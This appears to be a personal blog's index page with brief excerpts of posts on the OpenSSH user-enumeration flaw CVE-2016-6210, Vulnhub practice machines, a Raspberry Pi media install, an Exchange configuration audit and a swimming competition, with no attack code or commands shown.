CVE 2016-6210 OpenSSHD user enumeration

The 13th if July a new wild CVE appeared (Yes, Pokemon Go is still a buzz for the moment).

The CVE 2016-6210 allow a user enumeration on an SSH server by comparing request time between non existing user and allowed ones. This vulnerability target OpenSSHD with a version of 7.2p2 or inferior.

That means with a good dictionary you may know which user are present on the server with an SSH access.

This post just demonstrate how to exploit this vulnerability with a simple example.

Vulnhub Droopy

Droopy homepage A few days ago, I installed a new pentesting box based on Arch Linux with Kali

in a virtual machine. In order to test it I select a light vulnbox on vulnhub : Droopy. There were two hints on the description of the machine on the vulnhub download page:

  1. Grab a copy of the rockyou wordlist.
  2. It's fun to read other people's email.

We will see how to use them in a moment :)

Installing OSBM without installer

I bought the new raspberry pi 3 with integrated Wi-Fi. Currently I still have a Ethernet cable running through my living room to my old raspberry pi 1.

Just willing to download the last raspbmc version I figured that it was no more raspbmc but osmc which is basically the same but with much marketing around it. The most annoying one is that you need to install an install (such meta). I was pretty much it was not really necessary and moreover there is no version of the installer for Arch Linux.

Vulnhub - FlickII

FlickII

Still playing with the vulnhub machines this time it is the turn of FlickII. This one is different from the others as it has an android application associated. It would be a great exercice to play with mobile application, decompile it and see what is in the inside.

Auditing Exchange Server

ExchangeAnalyser

Recently I performed a MS Exchange configuration review. For the "old" version of exchange we can use the Microsoft Exchange Best Practices Analyzer. For the new version of MS Exchange (2013 and 2016) the tools must be download from the office 365 market. But most of the MS Exchange server are not directly connected to internet. That is why I used a tool developed by Paul Cunningham: Exchange Analyzer available on github.

12 Hours swimming

swiming 3

No code this time, this article is about sport, and relate a swimming competition. My town organize each year a swim competition called "Les 12 heures de natation" meaning "The 12 hours of swimming".

The principle is quit simple: you just swim the longest you can without "long" stop (you can stop to drink, eat a bit and go to the toilet).

I participate to this competition on the 30th May.